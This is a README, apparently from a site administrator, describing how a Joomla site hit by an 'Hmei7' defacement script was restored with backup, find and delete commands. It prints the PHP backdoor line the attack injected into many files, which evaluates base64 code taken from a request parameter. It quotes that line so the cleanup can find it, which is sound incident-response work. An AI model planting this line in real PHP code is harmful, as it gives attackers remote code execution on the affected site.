Giter Site home page Giter Site logo

hmei7-cleanup's Introduction

Hmei7-cleanup

Background:

I had to clean up after an HMEI7 script attack on a Joomla site this morning and figured I should share my efforts. The site owner did not have a recent backup, so the decision was made to clean up the existing site.

The HMEI7 script is rather crude in its approach. It modified the index.php page and and replaced it with Base64 encoded version that containing another Base64 encoded redirect to some external site. A good number of .PHP scripts were modified with additional lines of code that would prevent the site from working even after the index page was restored. I wrote a small script that tracked down the modified pages and removed the unwanted code.

Clean up:

  1. Backed up the existing files.

    tar cjf cms.tar.bz2 cms/

  2. Identify the time of the attack. The script drops its signature into x.txt in the root folder. The file contains "hacked by Hmei7". Noted the modification time of the file

  3. Find all files that were modified since that time. In my case 2 days

    find . -mtime -2 >modified_files.txt

    Copied that file per FTP to my laptop for later reference

  4. The attack script added number of new files. Removed all

    find . -name "index.old.php" -exec rm -f {} \;
find . -name "index.1.php" -exec rm -f {} \;
find . -name "class.back.php" -exec rm -f {} \;

  5. Cleared out the tmp folders

  6. Analyzed the modified file and found a pattern. The modified PHP files contained the following additional code. It would be either on be on 1 line or on 3.

    <?PHP defined('_OLD_JEXEC_') or die(@eval(base64_decode($_REQUEST['comment']))); ?>

<?PHP
 defined('_OLD_JEXEC_') or die(@eval(base64_decode($_REQUEST['comment'])));
?><?php...

    I wrote and ran the cleanup.py script to deal with those. The script creates back up copies of every file modified by adding the extension .bad to the file name. Once the site is restored these can be deleted with

    find . -name "*.bad" -exec rm -f {} \;

  7. Checked the .htaccess files

  8. Checked the configuration.php file

  9. Removed the x.txt file under root

  10. Copied the index.php back from backup and et voila the site was up again

  11. Ran a quick grep tests to make sure I did not miss any files.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.